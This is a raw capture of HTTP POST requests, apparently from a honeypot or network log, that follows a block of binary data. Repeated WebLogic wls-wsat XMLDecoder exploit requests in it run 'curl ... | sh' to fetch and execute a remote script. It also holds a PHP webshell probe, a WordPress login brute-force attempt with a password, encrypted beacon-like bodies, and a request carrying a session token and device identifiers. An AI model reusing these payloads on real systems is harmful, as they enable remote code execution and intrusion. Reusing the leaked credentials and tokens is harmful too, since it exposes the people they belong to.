1.058450ba4f43e48081600166f@cd9d92b6929483e0782437091a67597425fdd3e90b5f955557d2a99343411559≤fi›ëŒ†˙/xú’ùysIñ¿øäÉøvv:‘yƒŒFgÀv!KB∆∞öp @‹†FBÛ›˜e‚rUÅ-∫2ÂSB‘„WØÚô˘2ÛØÃÕ¥˝í…˛ïÈ3Ÿˇ˚+„1¢πóSúµBXóÑ,ÂiÆÑ•¢ŒÂP¶~;ìÕ|iv;óÕŸCÊ∑L{û…¢fl2flÁ„ªIs‹Åü∂¶„ì.|9õONÓÁ7OÕóÂ≥˘}Ôƒ¸t>È?º–ˆ…›®˘“ôù\ôoø_Wö˝«é◊Ç·5ø˛®l¶4õNÆN·’á˚L3ÕSB0I‰~≥ãVÓ<îfùŒEÁ©9kôfiÕÔv)π"lEy1ü‰ßÛâÅ\}ôÕ¸˝»õD)•lÎÌtbƒ˛L%FH;ÀÜ≤ÕvŸ|ϯù®Ü¶’÷ÒbTß•Fx≈vŸütGhˇ’>–¨¯∂_l•0ü¡ßM'˛Á_( §c‡ëu˚(É–Ècgˆ£*Ê⁄%"!b û§Øòí€Ü˜›√∂m[i‡	Mµ´™ìDIıFõ≈$%£ïí"D’‰ñq•D«•SFôaW[¯ìÉŸR7Z%∏¶÷„Ct†ÖÄ}/F¥Ñ%zgõë÷–)‚í—Bº Ñ⁄÷WLÀ3l÷≠"6;÷3˚…{¥Í4°\Ω5“äîl`!iq5–ù‹hÖÿ¨/"µY√¶¨EºÕJéô∞ç£:)Ô§G∞ö;g
ùrjÑ∫ÿTª⁄f…õ6âª$8qœZøB#!!Ô$96¥ú∏⁄£
Ë¿•¸€qôWÑ≤<«^æDµ,öó¯%∏DºXtq˙Ä3!8•¬∑cà§HÓì€r;
õLÓì[t;úIÇMH≥ß:I(fiÉt9Ω`â˝Iµ|g‘π	o>ÚaSnø´ùŒ,ȨOa≈”)Õ∏K^OR™x‚”¥ï1Ñl“’ëH¿Vùú>0lúã7èD™î‹–
·Ë®FH∑1Ê‚Ä—*Arr˙`…f=<ƒ¶*f\Ÿ~&ù™(%µ|£V!m]ëqň´ËîÕjä]Õë
suTÉ3Mò≥™”DÀ7èj§’ΩXEGúm∆YCÁ“4=QÆïì√i!€·≈+i'«QAÌWpƒoHi$2†Â‚‡ù≤—t⁄°)?C$µûòDFãêÕz$ã¥cEÏûD´cÕ¯;)àhyÚÿÄ≈Ïÿ–	‰“0«Ñi·®—l÷≠"÷h	V‚zΩt#-!ÀwR–ÈËú_@GëC•Á@D—Êû[-ÿØ∞M==¶`∂¸‡ûX∫™£ú“7◊§5vlhYÚ$ÅÕHt‹≠H›Fåú¨Æ	Ÿ∞ıjΩÿH˘ß"÷ì∫h’1Æı{Y/¥!˚•èqFtªTõD–…vt4≈∞ÈÉŸRè¥I¨^ÉñÆÍ8RÍÕÈqJÉ«VÀÉôvvÃëFS¢ÿ,«ªj≥ÜÌeÈ€,E;⁄±‡î`Ù÷	üî&i
,A÷™∏8kË\Z.bà∏≈—ûa√÷óƒ&«3%¨„E´úâ¬o›!µ‰hµ˝ùX0&OÔŸt,ÜN∏:œÕ·H8ˆƒ€√ÎÔ“ç∑ÜÕ›"P.$A×,OH∂πÃÌÓÖêqgßπ
ùS5†@§π˝±≤òxkÿ¨è1∆¶*R*B≠óªE´N*Ñfiº\%µTh±˝—∏4¿–	ß∆$§»…—¬fÀå[w(±F´0í…ªïÿ¥
πëo∫=&∞{:j6-–i‰R·6	%ù™
ÿ‹-’©‰MÌ©N3ä»{Y!eh±˝Ωá‚≠°Ì’dàó÷3–Ë@k˛±?˘hµÄN£ı·ß’I$ı;Y!e`uÚ*=´6tn
æk…≈·ªÖ¶-ÄÌR∑¥≠@î¢√+SU∞1ÚNˆW`r59Ë®K6DZ$Ø∞Ÿ¥Hʱk≥“Ãò9™:I67ïv‹fÕÊ√ÆÊ∆
q©là$IÓ–ZKB6Îäqπ±¿å+7˜D4lΘR
jh¡.¬ÃÚRñXI&Û^ë{≠sTPÂa&RRâ;òm*fΩ”ÿfl}!hî∏”È
à§õ¡8dì…õ:⁄∆Ä]^©UùÊÇ°∑é.ßcÿ!-?|oöT3ËêNhwÜó
Ùyù‹{…ñ\b/kÑ“…£6•7äq8É`5≤_ªóPq2:êFf˘Øt÷√X:¬µCKG
EnÓÒ≤±‰S–l¶*cπîì©
∞q fiÍı“JU-stgï%ùvgÈ®!"H:πfi{…vxfÍFKB…5›ˆTG÷Ï}lÖƒ≠Ô∆iâŸC¬ùí≥ÄHi'á¨ñl‹:[lˇÇhpw÷'pcTßïz'u¢!≠v¥NtI«›ôV"äwrOü%õptZÕ‡Q ù¨"ÿ8√Ô¢|%ѯ‡~F⁄Ÿ±°.
‰
ëfi≥>”f√∂ÉüeÍ6Àï‹˙±—ÅñI™Ö|k†M•N4†eHY_⁄hÅŒ•çUÄ»l܉‰NK∂‰§…™—
é$u‘fl	3¡¸>|á¥$y˚ı=√‰)1æ7Ìl †ssÁFC¶‚P	ê!íxœy{
◊∞Ÿfl–/vP@(NÌèYƒ®NcŒfi≈:¥V8∫ÖƒíN;5ê'¥tsS§%€·ïG©ß*íCRÏby|¿&—ª)X,ûeI;ŒJs˙Ì≤¶„RI0Ç1®óra]*…|^`ET±$∞ÉߢöÚM!5s»Îëƒå[ÔPFÖªÄ瀜bb2¨Õ
´‰’؈Tßï±å˜—A
hâ˝ú+:UË®KıÜH≤√Wæ§ÔB∂√˜öJ9U iL∞ãK÷6.Ÿ[W§d¥
≠:|√étsÖêN94@L
!'NŒ˘-Ÿ\ä$»ú√{8^∫™#T·‹¢tÊZ.≠W|GG⁄ÄN á&ÍÅàQë.lÂxK6ÎYSLzLeä$W⁄SÂ<fi{â¥@ãfiH;“:Ó–Ë7A/€…c=ólÆÎ	xLk̉.l¿ÌåΩìùBZN-Ø	È⁄£8 íT;πÏ!`cˆw˙âç¥ú∞=˛Œ^§ÂD
Ú÷ô˙t¶¨Xôl≥6≥cCÁVóñS§ÌØ+åixÜÕ˙ÙcºÕ™}['ZTù"
Ωu8ù)´V~ÊΩç‚√H…·5À©Án”i$:Ä< ‚Z89Q≤æômÍ›sLÀ·ΩütU'«Ù}ÏØ“˚{#ƒ•*ÜN:ï™ç)rrû{…f˝Y∆¶*í(äMU$1≥Ô$U
Xïhm⁄¨°€8M∆
õïîJω4w»v¯l^ÍÅVqı˚Ÿ¶´:%îbÔd≈M@´flx ÌÏÿ–)ñƒyÑÚÚxA∆\ ≈+`Jq
Â
<Øxa]gfl∂qP¡b=ÊEïÄÕ˛˘AqÒ√öºúƒûÍ4Å(Ú÷·æî‚1¿Rî|≤µ≈xlË0uhˇIC$≤><◊Ã⁄CW„11SW…9¥µxl|sÒ∞€_C˚À÷≠å˜å…GmYÃB:W«˚"
sá™mÕ
€T`7À	∂√«nSw{ò©=ßßZ㿶…ª©∂5¥‘’’t!ùr©àÄAˆs¯òñgÿ¨ÁQq˝Ç°ûºÿ⁄¢Í§ÿ◊p∫ú¿¿˛ƒ~äiZCÁT	êŸZO9Z1∞1gKÄ
í
€x—™£´7Sû÷xü°›3Éj3–Rn6u…h)óíπY|∞πz‰1‡qL¢·‡m
yRC≤,JD“|æ(ºb¡√2_(‚Ç$DªxF
≈åIúº-˙V£Ó<îfùŒEÁ©9kß÷1îä áF“ë9$«≈.e¿∆ïìÖ∏
õPÆéÚQ,ò“‹…Q>j∂ÛbÍM3¡õV`πvz«¨ÄÒ'Œ
O7ª_“YœW£”†
QëÔfløeÓ;˜˜‰ÓÉ◊ú?LÔ@@¯ù˘Í˚fl¡ÿ^∂ÈLñH£*£ßü˚∞Ót
Ür“ú¥g”~˚§;æ?i∂ÔOºvÙßV©¸ù≤Ï;•†4åâ_/h\#ö{9HÚÛê¬`]≤îßπ.îä:ó3>„fi4àÔÅS1m@1%∏@únäeXP≠†°Ãö∑∑˝V&˚Wf~7ö6€flWØ`
ø1\4}ölˇÑa镱«Lg“fi˙$ç$a.äoXø⁄t§bQ*ˇe•
fÉÅZπÃ+ËÿÂ9ˆÚ%™eÅ–º,¿/a∂*£‘jº⁄(q-%jTI¬EîBπ§&µ€Pg`&©[(TÖÁˇù∆Éó˚•a=
ZZ¶Ã¡flÆ<"¡ª˝ö—Å+Â?ˇYØ72ùœN¸È¨cSÃ≠∞¥çÊ‹ÏW'∫˜êÃ≠›ªHµñzS™&ò!ôÏD9ÉûqîÕk¬Ãl“é5[o	Lï8∫e∆·G6ù_µ¨ÂÒDGÚ»(2¢˛b√].∏<ä4
~^á±"uál–¬t˛˜n≈—r±V\+ÃvÂR‹wZ1+•0·Go}¡I`åXR#•LhæN¢ˆUÔEh—î™&Èbìì(∆p§ıjb‡Í'A¶s¸¸	H%∆ñ¥OÃ∞%^iÔ[шÕpC‹´K‘>áTÉF&\¶_Ù£˛·Uc,˯˘+W(~%táèÅ‡Ω©¸jÚf:ôflØ{ì¡∑flÔ!æ∂¯∫∑g2}∞tN~“˛ƒ‰ïa!TséºôHJúø¨Â%^<t∆·à¢yı>≥JöKJä8ïK˺∞, ∂ánôò®
6[9oë¡{»åÖ∂áL√]˘*XÎm0≠˜p˝x˘ë∞$X/}ïK∑©Ë>®›ã謧ëêú؃B◊vÁ!ä=\Q"»˜π∑´¯ÛfÀô4ßw≠?ü·ù`8ÒñÿñÄc®ñ√ˉÆ<%hÁÅ¥á,B¿ë»î¬XΩ
f;.Ö%{î®ÀèÉ•Õ⁄ûïßílK≤=X?^~,é‚zÂà‹ÒsB2XîÄ„êa„3…⁄Å ]ºÁIÜËñÄ„êbÆnôÌÍåÌ”YÑÄ„êQs6Ï*ûR°v¨R®=dű%‡8dpè–;Y›2fiiˇÔ1Ä(
«!„–∑—´á!wô‹„«‡r∏ÆıÂG¬¢êıØ∞ËéÁß{ƒÂ«¡Ñ#±Œã‰N˙Åer˛)‡Hd^	F|áÒ}dFŸp2	i<_ªHäv≥‹}m,†∂áLa»VÉÌ<L∂ÔY¬Âz›ˆŸ—•f–„¬Î‹`∑Òì}≠?B¿ë»$4뵋âI{∫+ÀÀÂÊÂG¡Ç0«]9GsRÛv€«$, ∑â:hk?$w¿‰^Æ.?ñ©ñf΋`˜A‚}O2J@\œ`Ô∞ÚO˜¥Ÿ[Yµn·t7“”ƒHˇ*Äl	8Çj52™iºv£d∑ÁL≥£W
|K¿q»Ç„fi7zsªΩ)ëËV^∞-
«!ä[WéîÏvÍIrØ>Z¿ë»Ã¡Ωk« v£™Hå™—éCfé']Ê;}{ûÿµΩ\o^~¨‡∆ıPflQÂ˚‡[éCfŒH£‰W}^¥Ä#ëôì†÷≠w∑oêÿ5ຸ8X¡a7Î!<§v3 =>6J@\ê8¸0ùÉo <6C©M≈Ï(61Ò|†∑Cµ·ŸrM∂€π'…ù˚W
zK¿q»Ç
–W>ûÌÊû,9˜\̆æ%‡8d¡.œÎnOï$wU_à-
«!‰Æ;8zóLÔ#ãp$2"Â∫ùQ≤€ëÿ«e.◊õó	ÀÏ®∑ÓÔ&ficòëéCf∂
Øv]F≤œãp≤`s§U∆+w¿‰>Ƈr≤y˘q∞ÇÌ_6¨íÓZer") .HæΩ÷7nrÒÎQn)Ôãr?Ø⁄p˙ _a±õ∞à=A"J¿q»p∞ÿv=∫∂õ‰·‰$/R¿ë»Ãí¬U˙Iv[„û∆^.6/?V∞hj=R$w/Ï
ãg%áØ„9¯¬ri∂≤R±€≈û∂) Ú‡2ΩN≥›ôô Ö€f‘iüu˛úwÓç43z‘lµ:˜:øyxπ3ı\~Ò˛	ü⁄ºªv^‡ÆG7MvÀh<∞¬–áÇ€=fl;≥˚†˛ ÉO‡7º:΋OGÛáÂã‡ï˛€ÿ1¸`˘÷Ô≠i€ËhªÛÿouæè·ÖºŸ?˝¿>WM%¨)òXL'6πz◊kÅDs“öM·=„|◊DY%≤-ë’*{K≥™
?ËèÔf˝`P˘iÓÁhÓ•ÒÌ‚Ó¶vU/Tã˨zŒ˝Ö˘ø㸬∞ÜÓnÉ˙«oÂ|oxVıh}‡Ω¯ê’S¯flˆ´£~e1|æû¯µ‚S•V͢‰Î†≤8Gıºc\{π ›Õ§fl?fl#•ßVIì∆∑èãfMœÀfi’ÛÁAqÓ_4œ’ß^vK≠˙ßBã]OŒjW¿‡?W™π~•–ΡgΩ4
>jT£˙¬ßıÒ◊º∆’sÍ*Ω≥BÀ+ê—ºE/z7ÂÁ€:Èın∆|tìÎÆ'óflºtWxöÒOfi◊ÁÓ¥≤ËÚFpß•1‹)©<\Ø÷ü˝⁄˜´CR!uTWÜgÖHæbïAó‘üºœıoπßÎ…7⁄µ&pWÑ’sU†ødœ—“ã¨1‚˙∏2™|\©ñ˙>)‚F˘
§˘eÅfi∆ER)q≈ÛŒõ5æhóK˜7%=¨ªµÀ£á∆E∑ͺÁ z™\¢gˇ≈{™Tßø:}©ƒÍ≠QÌæ4£a£¸q\©V∆†≥'øjÓÆ∏âø®Wá‘_·+/?÷ãÌ{:üWÚÿbtRœ_@W∏QûÖ·K£|˙˙Ç;2O£»+Éãº∂®wΩ\ª◊-˘óhq=˘\ık√/˘«·4Ì©Kœ
#–ÀÓƒ„ıEùUπA•Í£≥¬¥©Ø£F!7™WK√ ¢»ÎÉ´ß≥Ú◊æÁ5˛l~ª∂∆∑”∫78•áO5∆Hfi0ÀSÖú>ÅæàO}fl\Y˚8«_{ı¡≈∞Q;ßuœπ:
ú>ùU?ˆ‡πØ'Ìæk‰∫ùF°z©£z⁄÷†ŒM+nT/∆ç1<°rë7jß∏æ8_ƒ<oyπûTàè˝Í◊~⁄c\ÈüïK∑—k‘Æ˜•^´Û∆π˜«f+çk£–B@n4ÌNie—"ıE•ÌgZÓR°ıV`+pÁï'œø΀∆xÙ∂p€*óxŸ´∆∑P˜◊ì¥<~≠2Ù´ yq‘®’AZÒ©1g–J‡ÓáïjΩ^Õ纋Uæú˜¿^Œ°˚ÊN≠Á†=|hïΩ
<}tV.2h’ÿ_x/gÁfiøÆ'¶¢l~Û}zˇÍ¶¸”`ïx€eı° Lµö≥Yfl8‰Lµ¯˘”ôY¸ºævÌLø ‡’¿;flŒG^õØ‚Õ¥93a¬øÙïñ,Ù∞˝VsÙ=tÊxÌaõì˘m≥ı0ü˝≠flúé˚∆Uk≠a“
‹e”œèKÛ∆õµã€f̺^X@#1{∑\8g˛ö@Øyy7˝Ú«ıÔ∏˛’ÎzÖõZiPŒÅg,L¡ì‹¡sõ¬S=+‹ç˝≈î5rÕ≥Õ∑ó[‰ÎK≥V∫/{]\'Áœïr˝ÈÏ‚¶~«÷o*¿∏~—’¢4®±|ˇ¡Øñz»Yœ WÙsµ◊´,ºá3òx~ß`˝]Z∫ˇs“U∑◊øÌ]Â=œ∏˛ØweO
Z¯Î`<>8π¿Ñ≈⁄S≥|˝ªÆïŒOΩ\m4º©ù„réÉU∂¿√\Ù¸Eo\åz¶ÌT çqΩz÷3’
~mÆ'+ÂÛ'/hSxZ/,U_FÀ˚~w“4O
~ígYÑ≥EïÂ<[‘Yâ≥Çf±Ã*ú’8ÀΩlAeQ>ããŸúÃÊM≈hÎnn$^¯èÚ√óŸ‘¥çÈÏ√¨Û¯
¯ØG9˙G∆T∂Üá÷[ö&÷n¥:qÇNL;Z∂ö 	QB*"‰o–!#x˝”õYs“filLa.
ØêÚıÔ¥lÄMF33Yƒi!P»∆g±|Vø=ns¯æ-%πeM™nÖnfiêªΩmr÷‘ùfib‘|lˇfiDæfiŸep6Ócô¡¨5æ—¯É[˘TΩRÏKê:¥∆ì>på∞IMFÕIwjÉó˙Ê—µzÕ…$»IN_∂%Ω÷r2N
ˆÅCˇ˘œˇUÔ”w@542ab0b6e8be2ce0d20e8d09f74dcf7420d79be93275f5553bf898937b6b0e00 086e2f52ad508e4c738ba28a9e08e31b

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
¸√ßÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îr\0Y›∆√«∆fl

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Length: 574
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  <java version="1.8" class="java.beans.XMLDecoder">
    <void id="url" class="java.net.URL">
      <string>http://83.171.104.73:4444/cve-2017-10271?target=http%3A%2F%2F45.62.210.75%3A7001%2Fwls-wsat%2FCoordinatorPortType</string>
    </void>
    <void idref="url">
      <void id="stream" method = "openStream" />
    </void>
  </java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

POST http://market.xiaomi.com/thm/checkupdate/hashpair HTTP/1.1
Cookie: serviceToken=0QxjFrjieRMkJ7AH4gTZJJB7i/AE4FAwfcvaQeeZRjmYNLpd68wgPP8d8dNjhkPiNUZ19a+uM9QeraZIhcAhHcTGf+v3zPAsinFkt3ZEVhj6ix7LJl1+Jtgx8QOXp//SJY+GqTsKxII7jabjdfPy8ZnNeGf8QpEG290kf3rCW/fUbfA6ShVSenX25U5lEEnHSHUPWgRMTP6GBvDsDxrDew==; cUserId=UmHQgtJ2PWdwXIYZq1PwDfYMMzY
Content-Length: 749
Content-Type: application/x-www-form-urlencoded
Host: market.xiaomi.com
Connection: Keep-Alive

region=ID&fileshash=b7ecfd9e94c62d69fd4e0b42297935c32fc8e25e%3Ab7ecfd9e94c62d69fd4e0b42297935c32fc8e25e%2C70eea0854c3559bf4af76d846859b9849c9d1921%3A70eea0854c3559bf4af76d846859b9849c9d1921%2C717e32293e4252874882f3921ace16c70866e324%3A717e32293e4252874882f3921ace16c70866e324%2C6716077fdd99692ba82bf40223215ac7e1ee2eda%3A6716077fdd99692ba82bf40223215ac7e1ee2eda%2Cece8251b57beeae6d18c2fbb4429079db180132b%3Aece8251b57beeae6d18c2fbb4429079db180132b%2C3c2d73c5f20a4930ec38b82772f1200d08e1b1e4%3A3c2d73c5f20a4930ec38b82772f1200d08e1b1e4&homeOpenCount=31&imei=d772f4a38f690ab2e4ffa54a09eb5c43&version=4.4.4_V7.00.55.00.KXDMICI&system=miui&freshInterval=7794&alpha=false&device=cancro&language=in_ID&isGlobal=true&capability=w%2Cb%2Cs%2Cm%2Cv%3A6&apk=107

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
›Ño'Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÄ5-Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache

BQ26ziYSBwssScj6o+zRvBPugieuDldetA9CSfIYCFocxdeKyUiD0onk5cOCDQ3VZgitXpojKVxY4Q2Fcg/QsskCH+sI97F9f6iZ2YHB7GWg7yBbO8tNI//FYjIoXq8zbBxIhRipFqycKoytY2j0T52gK6nY+SVY27Y12Ur+CddCFbachnK7TM8r4ZI9tN13VmNDSd6PKIhWyfRBon7tfBbcY3e350SRN2j8zCGW44t32VNEo55Xej9ihYMlNi1xQBe59g4NCjZYp9EvGP+nQxh1wvWZtLzr2MPLdvr9JyeIdE4IpecaMBgPmfowps5QaF9wcHSD9RnvWgyx8o96EH7Bs5mhTwA9pjz2bnzWDIL2OHnzMUmZIjW+TUuKC4bwhlHeozjzp6bQPOdSKxByjQHWmqcv

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ÖÖ§ŒÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îp2Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache

RPFayNOeYbPbqqZUwxcb5BMCpol/vjnlLccy4adRcvr6PBR38VaLz4kpPsRL0Tq2I0tGySw/Kn9YObSUSbPbHtWLs3IAyIzqxH6wyOOJdrhHIxYYvz1pf1EFpx99jawA4/AHQHUNOU5bE/vuHYScu1Kyfq9RAsNKYWVkivvuB/KhAbHxVH9sRmK4cF3tSCKCnXSK/RErHiU38gUnhaFP51Mrt2V3XZ2GLT9yOqrC8OyYctETGByutT8TZ3YmFrtOXeV8jRSLbEhvQQBKt+6KB01w71IpKwqVZB/HXCaOhSA70beUu6EK+TRIHL4LpqKMXADiMGQD8wtV7apldlObV5ldt1k434TaRqhImM1tNa+ulsq1xSvIEcf5udy+oa3bQdOLag==

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=www123

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Á*4?Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl

POST /sdk HTTP/1.1
Content-Length: 441
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Host: x.x.x.x
Connection: close

<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 576
Cache-Control: no-cache

FvcLx4zMZSPA5iZ5pCHmT9IrXQ5s+TZ98iL3YesQ0mHnhPAMWjctPeEtg+1NnIoP6qkfXmlq1GgUNy7q+r/GZkRUpMaH89TqUxn3oGfH19sFQkQegGo1bdUYtZCxzmbGARL8XT/io8EysAamAqBddNXnqr59EOs7M4gmo6MZCl/ItZ4C5kZAABby0RKBoSoOAeNC5c763dn+MUDZCd5SaABKBufZSkRzLnP9G5D31sroiHP4AnES/s7iYNOA6XEpe6bGqbhbjJhh9+gACBDXDv6N79Rw1sLpOvc2P0gWN7OM2a56VqDoOMQ6+oz9zAPGLZ9SU2plPjOTW25nz5dK2dU1WKKeXvzhdXF7YXxM3mh4w34kGij/OG7WjDCXY9HTUXMloO25Ud6id6uss8rzGXW46Pd+02qvHPjfkmtq8slzoxcG9zXxlUHVgoANIlq233R3lx+OVPG22NKzt0eQYhauSL9FQQ5f1UtsmmZnDuDVpRHu+4uF3RdKhCeU/xwv4OiOxJMb1H8miwHy5WPd1CBV8oIivmtMmdnqoHufjPH8hUOH1NWy5a+j0rLrgjnw

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
